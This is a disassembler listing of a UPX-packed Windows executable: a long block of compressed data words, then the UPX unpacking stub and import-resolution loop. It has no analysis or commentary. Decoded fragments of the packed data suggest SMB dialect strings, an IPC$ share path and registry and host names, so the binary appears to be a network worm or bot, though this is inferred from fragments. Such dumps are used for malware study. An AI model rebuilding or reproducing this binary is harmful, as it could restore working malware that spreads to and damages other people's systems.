dd 0FCC11C8Dh, 46C9EDBDh, 2E741CDDh, 0B674FC41h, 0E7360D6Fh
dd 420EC4Dh, 490C8D08h, 8C698902h, 891441FFh, 3B05E2C1h
dd 0DB2676C2h, 0DB38A612h, 0CF51EC36h, 0DB1F42Bh, 0DE1D214h
dd 5DE58B59h, 2C16C8A3h, 1875EE18h, 3335CE2Eh, 1D63030Fh
dd 68106A56h, 24D8E16Ch, 0E4CE427Dh, 0CC187751h, 0B427B492h
dd 83F88B1Fh, 9E481FE7h, 5D1A03E0h, 0FD0B8163h, 30BAD885h
dd 0E141283h, 0F82B767Fh, 0C01C4375h, 0C44D8D02h, 0C77021BEh
dd 8D2C6604h, 2A0AC455h, 45B763FFh, 992603EFh, 458DFFF7h
dd 304E8DC4h, 0EF621970h, 0C415445Eh, 48114720h, 4D7DCD67h
dd 0C08E03Bh, 1FE99DA1h, 40CB7C2h, 8BE85563h, 8FB8D742h
dd 0C8D19423h, 17C3046Dh, 0E36F4FCBh, 5B2CCC90h, 7E355855h
dd 14B42E21h, 8B96531Dh, 0DC0F48E8h, 0EA44609Eh, 0FD818CD6h
dd 781D7E73h, 5D12AC06h, 6358082Ch, 25E395A9h, 0FC9B8077h
dd 0B0C74E78h, 80931003h, 0F9256610h, 7C5754D8h, 0D38A8814h
dd 7F4BC916h, 9F68EC10h, 8D194D70h, 0DC25023Dh, 0EBC280EEh
dd 0F005E272h, 0CA0306B2h, 0C748C5FEh, 69C80313h, 76AD882h
dd 34200C6h, 7E6D49Ch, 58080E8Bh, 1C262C45h, 84584914h
dd 54A0BB11h, 7810893Eh, 0E3099006h, 0FBEFC314h, 0F8DC6DB0h
dd 0F601584h, 61D8C631h, 0ECD8D4EEh, 314198DFh, 4DAF0FD4h
dd 4AC103D8h, 31A25069h, 39830632h, 3D623B32h, 865287B6h
dd 0A54FA0A1h, 9AC604E9h, 45F684F5h, 0E78D5FE8h, 0C1AC0DC0h
dd 59860EE0h, 68EA744Bh, 9EE02D3Ch, 0DCF8B52Dh, 15A54F42h
dd 75A93B0Ch, 75EE8382h, 3A9F7510h, 0E8D52A1h, 0FD40E9F0h
dd 0AEB2F8C9h, 5851E10Bh, 20F633CCh, 0B9BE1EC1h, 0B48B54F2h
dd 9E4D0C68h, 0C64EA7D3h, 5079066h, 458752B4h, 9C7BB6B4h
dd 1AE89A36h, 5250C10Ch, 0F62C7D54h, 32C00E4Dh, 0D2334369h
dd 0F6200BB9h, 0F144F67Dh, 95148B21h, 0EE7E5289h, 0A1B7DDB0h
dd 79820F16h, 0AA76EB16h, 0D643D46Dh, 0D52A66FDh, 23121C11h
dd 0FD8313CDh, 0DC7C6D96h, 0DD7522C5h, 5AF20AFh, 1B039D9Fh
dd 2278C281h, 2BD92B69h, 0E69C12D9h, 0AD0A3A50h, 0E6583230h
dd 28D8D1Eh, 935B3085h, 0F9803480h, 4DA40E0Ch, 0F141614h
dd 0F0A9FB0Ch, 828CD7A1h, 0F5301C68h, 0A7D1B065h, 1985D8F8h
dd 6405EE0Fh, 0C329BE29h, 7C5F140Fh, 0BC402D02h, 4D1868D2h
dd 5BCD6EAh, 6A8107E9h, 42ED806h, 4C565018h, 256724BEh
dd 0E9365010h, 24545F3Ah, 0CD900B28h, 0B19014D0h, 1C9A0277h
dd 0ECF6C87h, 5350014Ch, 216F0A3h, 578A45D2h, 0D80332DFh
dd 2C296407h, 0F08B0C10h, 0C56C1351h, 3C56DD49h, 4E0C6EF4h
dd 8B05FA10h, 575650BCh, 56AAA4Ah, 46810666h, 0C8E6C50h
dd 49CC2B5Ch, 2683F18h, 68C6E8F7h, 0C04574A5h, 6553D89h
dd 12917098h
dd 0F70914CCh, 76CAEA07h, 0A31B45Bh, 0F668E0Fh, 205EAC5Ah
dd 537C6AA1h, 0B49A11h, 0F627F966h, 6EA17A4Eh, 0FE2F6BFh
dd 0D841F58h, 467C133Ch, 0D93A66B6h, 0C1D8562Ch, 28212CF7h
dd 3780D7Fh, 8D522D39h, 0C51B1684h, 30502C9Eh, 5879C4C6h
dd 784F08C7h, 0D5756C68h, 70857A5Ah, 3D35DC2Ah, 6C7D004Eh
dd 0DB8FD5BFh, 2B8FBDDFh, 3D436005h, 927C0h, 38C55776h
dd 8211054Eh, 68A04FB9h, 0EA0F3A68h, 0B50706CCh, 58464E94h
dd 5B9B8C17h, 2752EAE8h, 0A34674E6h, 0DC642E41h, 0B930141Dh
dd 3805C701h, 19A07B0Fh, 0D40A3B3Ch, 0D9B78D10h, 30601926h
dd 68A19CBBh, 0BC0923C0h, 681CEFBFh, 4D501C58h, 0DC2E66C6h
dd 3F45964Ch, 0DE9A240Ch, 64A11849h, 6C0C0F44h, 0AA114D28h
dd 27C90C0h, 3D87DD16h, 6B217C1Dh, 55365068h, 42FFF6A9h
dd 0FFD65903h, 0A72F53Bh, 743A3E80h, 20094E0Ah, 73E606FCh
dd 5E8DAEF6h, 96216A01h, 84FFFD3Fh, 8B2F74BEh, 4AD62BD7h
dd 7D64FA83h, 50530025h, 0C67990C6h, 0F91E0784h, 0C0C24E38h
dd 0A2687316h, 60E5211Bh, 0D2EC94A0h, 154C0268h, 0E13456CDh
dd 52086004h, 96330084h, 70F1795Ch, 56C0356Bh, 83D710DEh
dd 427F257Eh, 5CB56DA0h, 0C280DA0Ah, 1E148861h, 0F89635A0h
dd 7CF73B46h, 0F83BACE8h, 0DDC03176h, 0B0CC11Ah, 0DF0A003Ah
dd 0B770ADA2h, 11B94254h, 417C252Dh, 3D78251Dh, 64F99618h
dd 0EF70A6BAh, 46017F2Ah, 2874145Ch, 0ECDC097h, 44405299h
dd 59D3DEDAh, 3D3DC84Dh, 42F0E69Eh, 44D41EEBh, 65C60605h
dd 8E3A891Fh, 0AFC354ECh, 0B514620Ch, 0E37FBB0h, 1775D609h
dd 74303F80h, 1118161Ch, 8F685BB4h, 408B078Bh, 1F31084Fh
dd 58890575h, 9B401C09h, 0D93C0FB1h, 6A3467E2h, 0CA75031h
dd 0DDC30C75h, 10DC5B22h, 0B5C3346Bh, 0A3B41A1Dh, 0B8B547DEh
dd 0E103D27Fh, 8B17FDBDh, 8B025050h, 6D3F0A00h, 51B151D2h
dd 3FCBF4Dh, 0B010490Fh, 0A15F2159h, 26B4F6Ch, 64B540D7h
dd 3A086405h, 0B059C2A6h, 0D06B5651h, 941613F3h, 4FB891A7h
dd 2E72700Eh, 56C8D121h, 0A5D31556h, 0FA0EA593h, 0E2830CFh
dd 7BC06813h, 41EC0034h, 7D420CB2h, 35C642Bh, 2611AA01h
dd 418048CDh, 77C7DE75h, 6A54A656h, 0A32B6865h, 1BD780A7h
dd 0A0D33A9h, 0D76EA3E1h, 0B8A35BDBh, 285051CEh, 8F7AAA6Ch
dd 20AAC377h, 5E221589h, 0B9640E1Ch, 3DF09824h, 0A7A8640Ch
dd 100C7181h, 0F18C38A5h, 760BAB4Ch, 77FE0105h, 1F87B65Fh
dd 94A3C084h, 33E87452h, 84CC8AC9h, 9AE074C9h, 60168965h
dd 560CB2D7h, 0A168931Ah, 0DCA9C91h, 0CCA1AC56h, 953D9912h
dd 7FB15320h, 5AC09030h, 0A06850D7h, 48E0CA2Ch, 0FC1AD368h
dd 0AFE3EB6Bh, 3CDB9290h, 542A031Ch, 3C7698A3h, 6E878318h
dd 889604C4h, 37EE58B0h, 72157027h, 1BDEF7F0h, 198068F6h
dd 6B6A90B6h, 785C1B08h, 3DC8B98Dh, 45C60D6h, 5217C68h
dd 0BB2E49C2h, 0A786886h, 3870A370h, 303CC139h, 8AB72F7Ch
dd 5DA9B6C0h, 4C05D487h, 80583C25h, 7B84C02Fh, 1D4C0814h
dd 7641767Eh, 1BD69763h, 0F00B2590h, 0C97B0F2Ch, 0A015E04Bh
dd 183D3F32h, 2363BF58h, 13888620h, 0FF3EB43h, 48F4B15Eh
dd 1FFE6394h, 2D14FFD0h, 2074DC8Bh, 3C32048Ah, 0ADB060Ah
dd 0D3C66BDh, 0A6A75h, 0A124421Eh, 3B1DC7D3h, 5AE072D1h
dd 8A164DEFh, 0D248522Ch, 0A101A0F8h, 0F845CF0Bh, 581725CDh
dd 7989EFEAh, 0C8834805h, 3B440FCh, 1CB84594h, 6C009EC4h
dd 5357B87Dh, 0FFF8F8ACh, 50F92B59h, 0F78BD18Bh, 17274BFh
dd 0A9457891h, 26ACA79h, 0B1906C45h, 66C350BDh, 66F87566h
dd 0A2E816h, 8B90D4Fh, 1D1B7125h, 0C411B76Ah, 8BEA0966h
dd 8B1A8030h, 30693D67h, 755F0D20h, 895D275Eh, 8A538EB3h
dd 760E341Ah, 5BB091E8h, 41B45A1Bh, 0A344CB84h, 0DB95C6A6h
dd 1DB4B524h, 891A33FBh, 0A155194Dh, 0D8E43C5Dh, 0E6745251h
dd 37B88572h, 0A0F17D60h, 44489C68h, 7A15FD4Ch, 0EBC253D2h
dd 0C61F51ACh, 76390584h, 0DC06E03Fh, 0BFFA3C1Fh, 0C2E11890h
dd 4FFF27Bh, 21F958Dh, 508FA8Bh, 69503B61h, 2C074FFFh
dd 1A9A2442h, 641F2181h, 345EC8B7h, 4D8C2D2Eh, 0A3408D8Ah
dd 0B132BDB1h, 0E004D9DEh, 0ABCD51D1h, 0C86C1854h, 8BD41388h
dd 90B02C80h, 4E20FA36h, 0ED8A1F5Eh, 0BB428CEh, 0B88B8FEh
dd 0A8D1DB32h, 3096187Dh, 0AC0E5C38h, 5B007BB7h, 17E91358h
dd 1BFBDC06h, 8103073Fh, 0D1030190h, 0CFEA252h, 0C3C2E09Ah
dd 0C7725780h, 0ACEF59D8h, 6F847016h, 0A44708D2h, 0F839A439h
dd 0BF8FCFCh, 57367AB6h, 70148C1Ch, 8F60C8E2h, 4588680Dh
dd 0FDFF07FDh, 0FE320DF6h, 0D71C30FCh, 74F03BFCh, 0D3EC30D4h
dd 6824B487h, 56D3B19Ch, 5AC061ADh, 5617D7DAh, 7623185h
dd 29ED021Dh, 0D7C8D73Bh, 0A7A88CEBh, 0C82C59ABh, 838A539Ch
dd 1C84B3E0h, 0F07E1388h, 0FD12A166h, 500978ACh, 0A366CE91h
dd 0FEE16122h, 0F181F760h, 0FE8100AAh, 240D899Dh, 2F72F611h
dd 0BE85B6ACh, 13136150h, 3F68911h, 6AEE754Eh, 0C00F61FFh
dd 2F601E95h, 33AB3F68h, 3ACE8F7Ch, 1B940C4Ah, 2C5023C2h
dd 9F00B90Eh, 48141010h, 380E723Ch, 5142951h, 0ED74839h
dd 514820C8h, 462F5052h, 5290313Ah, 1C033E59h, 62148914h
dd 62D9C44Bh, 4052A0F1h, 0EF082BA9h, 123BECD4h, 0A3645053h
dd 22F6C936h, 0BC116401h, 9162C159h, 7A57BFB2h, 7BECE46Ah
dd 7E005201h, 0C01EC306h, 6BDB187Bh, 0C9DF99B0h, 0A6162159h
dd 514F1104h, 60365BA2h, 79F0C37Ah, 6DEEA9C3h, 7870CF9Ch
dd 0C95C35D1h, 0E6AB0403h, 32AD6344h, 0E82C17h, 0EBAF56D8h
dd 37059AB3h, 9305C02Fh, 0B9588ECCh, 0A9B2A957h, 58CCE4DDh
dd 0DB184075h, 0B6E72E50h, 0BA423BA0h, 4A8406D6h, 0D4182A1Eh
dd 4C94D9B9h, 0D2D4F36h, 5040604Fh, 3FD41CB4h, 0A26CB2A4h
dd 80B0047Bh, 70EC23B3h, 3748283Eh, 16883514h, 0D228C50h
dd 0CCBBB4ABh, 3436241Bh, 0FC37865h, 0DF773DCh, 3FD3378Bh
dd 2316CDD5h, 1BA99B64h, 0D0715116h, 64BDC1A0h, 756C23A0h
dd 9AFB311Dh, 0D3A856A3h, 0F404E4B5h, 0C8E59Dh, 0C0179009h
dd 0F574D46Bh, 72C71C24h, 3BD078CEh, 7DAD60F8h, 0EC01674Ah
dd 14A329E6h, 75664452h, 0B216720Dh, 18B1A3Ah, 52C1902Ch
dd 760C5DB2h, 421E1408h, 6ADFAF56h, 1063D99Ah, 443E366Ah
dd 0D4D21FE8h, 801D0B69h, 0AE404F5Ah, 0FF53C5F9h, 250CE025h
dd 0DF00CCDCh, 51DEA7F7h, 720A4A3Dh, 0BE98114h, 6E85042Dh
dd 1B1C15Bh, 68EC7317h, 0E18B0CC4h, 8EFB646Ch, 500440ACh
dd 0D83FCCC3h, 3C4745D4h, 0D06761h, 903708B8h, 0ECC122EFh
dd 9B0FC826h, 0B8EC0D10h, 3E3F0960h, 5201A60h, 28BF1993h
dd 0E6650E37h, 738DCC0h, 2107FF00h, 0B2DEF9h, 4A502F2Bh
dd 7ED7BEh, 57132459h, 0AC0801Fh, 0F057D931h, 0F17400EDh
dd 2060A88h, 0BFFF24CBh, 5352BF9Dh, 8003141h, 6711F501h
dd 6D80B482h, 493FBC44h, 0FFFF233Bh, 9747FFFFh, 10B644BCh
dd 46041DE7h, 519A52BBh, 6FCE6CD4h, 0CACF3F4Dh, 0DAB6AA47h
dd 85B84617h, 0FFFF0CE9h, 5055FFFFh, 0D725C687h, 56274C62h
dd 0C66068B7h, 54E02C5h, 435BBA56h, 3965E65Ch, 0DD7A2D4h
dd 0FFFF90B1h, 0D377FFFFh, 99091ADh, 9683CAC8h, 0A2D0C038h
dd 132714DDh, 0C8E8D428h
dd 4716DAC3h, 6237CDDEh, 0FFFFE23Ah, 1650FFFFh, 62EE766Ch
dd 0C8FCB386h, 0E03A95B8h, 0DF06B735h, 42653CDh, 0AF2C3CB4h
dd 0D55D6323h, 0D12F052Ah, 0D89FFFFFh, 0AA1D6687h, 34051686h
dd 1390A740h, 8D10151Fh, 6CA265DCh, 0FFFFFFFFh, 0D4709EC3h
dd 3CAF03B0h, 8CD05411h, 6EC05DEEh, 6ED7652Bh, 87A772ACh
dd 0DEB851FAh, 4A3474E2h, 0FFF42FFFh, 6A1D25E3h, 0E9A35A70h
dd 0E789EF64h, 18FC0E9Ch, 1C20F3A6h, 4DB04DC4h, 0FFFFFFFFh
dd 0ABB374B2h, 2980D04h, 0E9A6EF18h, 0F74ED25Eh, 6CD77308h
dd 0F54BD948h, 0C476D37Ch, 87DD1356h, 0FD087FFFh, 6F63E9DCh
dd 0EB8F746Eh, 0D5341227h, 5DABAAAAh, 0B966C933h, 0FFEDB7E0h
dd 758D021Fh, 8AFE8B05h, 7993C06h, 302C0646h, 0FF993446h
dd 0D3A5FD0Dh, 0AEBEDE2h, 2EC9DAE8h, 2E676562h, 0C9999371h
dd 7FEDFFFEh, 0BDFD1201h, 716FD91h, 0AA6872C1h, 0AA66FD42h
dd 14BA10FDh, 1F98FF1Ch, 1AFF75BBh, 0F198F3C9h, 71028608h
dd 5F901013h, 0B7DA37CBh, 5992FB1Dh, 0DB91C96h, 9B037518h
dd 0C125CD08h, 10F6C8FEh, 0ECE4DC25h, 5D185447h, 0EC7FB11Bh
dd 449FF3DBh, 0A9719BF3h, 0E368F319h, 0E71C1065h, 0EFED6F0Bh
dd 0D9751AFEh, 0BD9D5EFFh, 0DC12FF24h, 0DD10FF4Dh, 0AC4F070Ah
dd 0BB7FEC33h, 9D0B0073h, 3296E514h, 0F3451232h, 2C66CA89h
dd 7FDF6731h, 0B16B71F6h, 74416713h, 88D95D1Ah, 0BAF31134h
dd 9DDB7DEEh, 98904F1h, 0F32D04F1h, 66CB612Eh, 0F3674FDBh
dd 0EF74F0E3h, 0FDB62180h, 56C9B264h, 0C0E86F2Ah, 169B2097h
dd 4C9FF75Eh, 0E5C1D838h, 0C959B2D5h, 0F93BC919h, 1FF63D9h
dd 0F40414D9h, 3571CA23h, 61688D63h, 7FEEDA91h, 1AC3F064h
dd 0A7ED6661h, 6C5D12CDh, 7F4ECBC9h, 79CDB272h, 5A1DF056h
dd 0C096A648h, 64C9FECBh, 294CED14h, 9CF3EBA7h, 0F7C9FE5Dh
dd 0F434FB93h, 0CED07126h, 0EF133BF9h, 0F908ABECh, 10BCDFFh
dd 0F6FEC5B7h, 0FCE1FCB7h, 0E6FFC999h, 0F5CAFEDFh, 3AE9FCFCh
dd 0F7EBFCF2h, 0C7AAF5FCh, 59AAF934h, 0FC2A2DB4h, 66FFFFC9h
dd 0E6ACC91Eh, 0C9A5B7E7h, 9DB8BD9Ch, 71CDC982h, 3519BF92h
dd 183F1451h, 95186FBBh, 2A91720Ah, 0D22AC871h, 80D512A5h
dd 0FFFEDFF6h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh
dd 0AB9E5958h, 0A319DB9Bh, 7FFF6F20h, 3A6CECE9h, 9EED85BDh
dd 81E8A2DFh, 125544EBh, 961FBDC8h, 42C28D2Eh, 12EBFFF3h
dd 5A9A85D8h, 9A099D12h, 29F8105Ah, 0DBDB13E3h, 66497FEEh
dd 12FEFD7Fh, 0C25AA987h, 12850295h, 57910482h, 5AB78C7Fh
dd 0B7FDF7CBh, 53FF85D6h, 9172424Dh, 0F243BFFFh, 0FEC85318h
dd 621700h, 20435002h, 5754454Eh, 0FFFE5F6Bh, 204B524Fh
dd 474F5250h, 204D4152h, 4C302E31h, 24D4E41h, 0FFB7F60Ah
dd 6E69571Fh, 73776F64h, 726F6620h, 6B035720h, 756F7267h
dd 0FB0E0E70h, 2E33FBADh, 4D276131h, 30583223h, 32323230h
dd 0D6FF2D83h, 544E0A16h, 204D4C20h, 0A4703230h, 7C8C9580h
dd 0B107738Bh, 0F65DBEC1h, 23FF0Ch, 140A1104h, 0ADF00520h
dd 53D4805Dh, 4B4C0069h, 505353h, 0DE48F6Fh, 8829762h
dd 240057E0h, 7B64006Eh, 0FDCDB1h, 77006Fh, 30743A73h
dd 738C0901h, 397B225Bh, 1D233500h, 3C00072Eh, 0DA01B227h
dd 0DA2008ABh, 80C9324Eh, 39F57h, 4EC1B06h, 47234666h
dd 1B9F4007h, 64079h, 1F011006h, 0A37FFF15h, 0E0888AFEh
dd 4F0048h, 6A198101h, 49E4F27Ah, 30AF281Ch, 0C8107425h
dd 67D81137h, 0DF5CE153h, 0CB075C75h, 4003053h, 5A01275Ch
dd 0EBDD7723h, 4D615C08h, 36072Eh, 0D8392E38h, 30776376h
dd 0EC00491Bh, 0E7905C43h, 3F00B3B0h, 0F2A26463h, 80F96DFh
dd 164004DCh, 0DEDE00FFh, 16000E00h, 0F612130h, 2602019Fh
dd 0F7DC3440h, 319289Bh, 0D96C8B11h, 65DF2174h, 70D36Fh
dd 6B9C2A63h, 6D9EC025h, 0E109F4Bh, 6E1B0448h, 54EEBAEBh
dd 265A5413h, 5C225963h, 0CFF9A4C7h, 6545CB7Dh, 0B000587h
dd 4F481003h, 0B81DA0BAh, 1110110h, 8FFC286Ah, 3919FFFDh
dd 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh, 8A885D5Fh, 11C91CEBh
dd 0F645E89Fh, 2B3C2FB2h, 0D1604810h, 87A3F40Ch, 60CF92BCh
dd 0CA00CA0h, 64727B1h, 0A0000C90h, 24F0880Ch, 407FDFh
dd 3EC0009h, 14950007h, 0BDEC840h, 707C4F8Eh, 0FF0700F7h
dd 43A5EC88h, 13857813h, 0C85BAB00h, 911284F3h, 2FF81013h
dd 139E3188h, 230EFEFFh, 860E9340h, 84084241h, 27934388h
dd 10B9EE9Fh, 0B801FFEEh, 90200C10h, 0ADC9B30Fh, 0F7F070Dh
dd 2CF92BD8h, 700118AFh, 80370F84h, 0F84C87Ch, 2000F95h
dd 0F26C3C7Fh, 6C0F84E4h, 0A89A000Fh, 2556F644h, 9513436Fh
dd 2360427Fh, 50586E69h, 79725020h, 840DB6h, 3B014A46h
dd 92796B32h, 123C0A1Fh, 41027515h, 0F6450053h, 9E1C089Ah
dd 563FD701h, 0E806EB39h, 5C73255Ch, 9D637069h, 0FF5B5CECh
dd 1CEC8166h, 0B3E4FF07h, 0FC037B4Ch, 4D34D34Bh, 0A8C8E4B3h
dd 0DFFA6C88h, 445C4D34h, 63726938h, 72616B2Eh, 4B656E2Eh
dd 2A37FF74h, 70736167h, 2E65646Fh, 2E0D617Ah, 37BE6705h
dd 630973FBh, 1361696Ch, 0EC6F0F25h, 2C26FED6h, 6B752E6Eh
dd 575652Eh, 2F72650Bh, 175B0BBBh, 6843771Bh, 1F74670Eh
dd 0E5ED6364h, 752EE48Fh, 736F6C73h, 6C65612Dh, 0DB681A65h
dd 6163D95Eh, 12726220h, 76731D73h, 81E652DBh, 55652F5Dh
dd 9F177266h, 6653DEC0h, 330E616Ch, 7A617267h, 0E4A6D52Dh
dd 6D74612Eh, 0DD771E87h, 8ABEE87Eh, 6B6F7664h, 618C721Eh
dd 66216362h, 0EDFE0D67h, 6B6ABFBFh, 6F6E6D6Ch, 74527170h
dd 78777675h, 4BFD7A79h, 41FFE5C4h, 45444342h, 49484746h
dd 4F4E4B4Ah, 5B015376h, 6F548094h, 0FDBB5AD9h, 53772F85h
dd 86205245h, 2A203820h, 0D073A20h, 5C5A4B0Ah, 726CFB62h
dd 2C795C65h, 7B754349h, 13C18DB2h, 0B532250h, 0A474E4Fh
dd 374AFC1Bh, 3407490Bh, 3F4A6F35h, 4FB587E4h, 55512F0Ch
dd 6F795449h, 0ED6D0021h, 6F63F9BCh, 68216C6Fh, 0A8656865h
dd 7B1B296Eh, 523FFC4Bh, 47915649h, 23712D82h, 0B914FF0Bh
dd 0C578652Eh, 697A6F4Dh, 0C22F236Ch, 348B76EDh, 442820E9h
dd 69F0706Dh, 6E438062h, 203BEDF1h, 20454934h, 203BFF36h
dd 1745AE7Bh, 54D135D4h, 57663F87h, 6425FBA3h, 2735022Ch
dd 85312DF3h, 773F0BBh, 4B747558h, 3307356Dh, 0FDDC2D9Ch
dd 67303172h, 482D716Fh, 0FBC2DB0h, 162099DBh, 4084449h
dd 85FE9758h, 530006DEh, 4185464Fh, 4D5C4552h, 73686369h
dd 1F0AAD6Fh, 5C7466ECh, 75435C77h, 0A4AD2F72h, 56868DC2h
dd 5C3A69C5h, 0C357AB52h, 55FF210Dh, 74616470h, 6F415365h
dd 5AC263EDh, 5A724F37h, 732A1B73h, 76496DADh, 0B22302h
dd 26841C6h, 560147C4h, 4B1B6401h, 467DB4A5h, 4A0C6507h
dd 41C6EA8Dh, 0C4636FFDh, 6EDFF3CEh, 69FDEDB4h, 6F430A41h
dd 69467970h, 756F656Ch, 45650E8Dh, 4E471EB9h, 0DD646F4Dh
dd 75F33DEDh, 1A48656Ch, 6D6D2811h, 86B04C0Eh, 10246BE3h
dd 388E5C44h, 699B4DB0h, 4D0CE143h, 3D417809h, 17F60BFBh
dd 6D614E1Dh, 69530D3Fh, 0DD338B7Ah, 0F52AB9Eh, 6E49090Dh
dd 8E60913Ch, 656BBB6Dh, 45630A64h, 0DE9DF96Dh, 95B59ED6h
dd 1D695436h, 0D617757Ah
dd 0DEDBF2Eh, 451B614Ch, 726F7272h, 300A7953h, 0B5BBDEC5h
dd 6F54331Eh, 523094Dh, 1896E033h, 36C56599h, 0DFDB361Bh
dd 0B1B26972h, 24E96FBEh, 0E76E1DD3h, 3F448053h, 0B6BD92C0h
dd 86687463h, 5EC71454h, 4D2AC2B7h, 36DB6854h, 0B6067645h
dd 63BB7B65h, 53204661h, 730D86F9h, 624F5B6Fh, 2C6D2E6Ah
dd 0CD8B05ACh, 297C2F0Dh, 0B05AC17Bh, 7065065Bh, 3061208Dh
dd 87135384h, 93B2C563h, 6D92C185h, 0D1F74118h, 0F09F9DCh
dd 4B896757h, 10457965h, 0E85D876Bh, 75F65699h, 0A510F65h
dd 4ED602BDh, 704F1158h, 0CC3B307Dh, 21D81362h, 0E1514210h
dd 0CDBB420h, 8D86241h, 70EC6853h, 0AE5758F6h, 70798E6Eh
dd 0D9487774h, 0F27305F6h, 12440A10h, 76DA0E61h, 69CEAFE1h
dd 67157966h, 2B75136Eh, 0C36BB7B0h, 6FD56C36h, 0B1112C79h
dd 6FB7B3B9h, 1E8F5210h, 0B60FE465h, 782A02A3h, 63411474h
dd 72697571h, 361C2B9Ch, 0A01E494Dh, 69FE943Ah, 0D0DE1316h
dd 78435F5Fh, 739C0278h, 58570CCh, 7B026038h, 7C73DCDh
dd 19726863h, 6B380506h, 0E9669C0Bh, 0B2708AE8h, 0CD38F15Eh
dd 13416676h, 2CAEF0F4h, 3738785Bh, 41B55532h, 2C160211h
dd 2023D264h, 91C70DC3h, 0E6E6E40h, 2B7453EAh, 2131076Dh
dd 73FFA4B9h, 59659602h, 6F390896h, 5912340Bh, 0C596596h
dd 2091704h, 65965965h, 316010Dh, 0EA2D8010h, 50F21384h
dd 3E5F4C50h, 0DA4B5F32h, 0FF40AD17h, 10B01E0h, 0CECEC306h
dd 132E7652h, 465B0B30h, 40256367h, 7FF020Bh, 37B2DCCEh
dd 341E0C50h, 0DEB2F210h, 0C40607C0h, 600E3788h, 7C8CC840h
dd 0B0AE1DDBh, 0F62E1E01h, 902D8607h, 6A48C17h, 0C854CC2Eh
dd 46851EDh, 0FB8279E0h, 0B75F0FA4h, 322B2FB0h, 4C01627h
dd 5E000064h, 43433980h, 90000h, 0FF0000h, 3 dup(0)
; ---------------------------------------------------------------------------
public start
start:
pusha
mov esi, offset dword_405000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_406F62
; ---------------------------------------------------------------------------
align 8
loc_406F58: ; CODE XREF: UPX1:loc_406F69�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_406F5E: ; CODE XREF: UPX1:00406FF6�j
; UPX1:0040700D�j
add ebx, ebx
jnz short loc_406F69
loc_406F62: ; CODE XREF: UPX1:00406F50�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406F69: ; CODE XREF: UPX1:00406F60�j
jb short loc_406F58
mov eax, 1
loc_406F70: ; CODE XREF: UPX1:00406F7F�j
; UPX1:00406F8A�j
add ebx, ebx
jnz short loc_406F7B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406F7B: ; CODE XREF: UPX1:00406F72�j
adc eax, eax
add ebx, ebx
jnb short loc_406F70
jnz short loc_406F8C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_406F70
loc_406F8C: ; CODE XREF: UPX1:00406F81�j
xor ecx, ecx
sub eax, 3
jb short loc_406FA0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_407012
mov ebp, eax
loc_406FA0: ; CODE XREF: UPX1:00406F91�j
add ebx, ebx
jnz short loc_406FAB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406FAB: ; CODE XREF: UPX1:00406FA2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_406FB8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406FB8: ; CODE XREF: UPX1:00406FAF�j
adc ecx, ecx
jnz short loc_406FDC
inc ecx
loc_406FBD: ; CODE XREF: UPX1:00406FCC�j
; UPX1:00406FD7�j
add ebx, ebx
jnz short loc_406FC8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406FC8: ; CODE XREF: UPX1:00406FBF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_406FBD
jnz short loc_406FD9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_406FBD
loc_406FD9: ; CODE XREF: UPX1:00406FCE�j
add ecx, 2
loc_406FDC: ; CODE XREF: UPX1:00406FBA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_406FFC
loc_406FED: ; CODE XREF: UPX1:00406FF4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_406FED
jmp loc_406F5E
; ---------------------------------------------------------------------------
align 4
loc_406FFC: ; CODE XREF: UPX1:00406FEB�j
; UPX1:00407009�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_406FFC
add edi, ecx
jmp loc_406F5E
; ---------------------------------------------------------------------------
loc_407012: ; CODE XREF: UPX1:00406F9C�j
pop esi
mov edi, esi
mov ecx, 91h
loc_40701A: ; CODE XREF: UPX1:00407021�j
; UPX1:00407026�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40701F: ; CODE XREF: UPX1:00407044�j
cmp al, 1
ja short loc_40701A
cmp byte ptr [edi], 1
jnz short loc_40701A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_40701F
lea edi, [esi+4000h]
loc_40704C: ; CODE XREF: UPX1:0040706E�j
mov eax, [edi]
or eax, eax
jz short loc_407097
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_407069: ; CODE XREF: UPX1:0040708F�j
mov al, [edi]
inc edi
or al, al
jz short loc_40704C
mov ecx, edi
jns short near ptr loc_40707A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40707A: ; CODE XREF: UPX1:00407072�j
; DATA XREF: UPX0:0040484C�o ...
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_407091
mov [ebx], eax
add ebx, 4
jmp short loc_407069
; ---------------------------------------------------------------------------
loc_407091: ; CODE XREF: UPX1:00407088�j
call dword ptr [esi+7094h]
loc_407097: ; CODE XREF: UPX1:00407050�j
popa
jmp loc_402E30
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
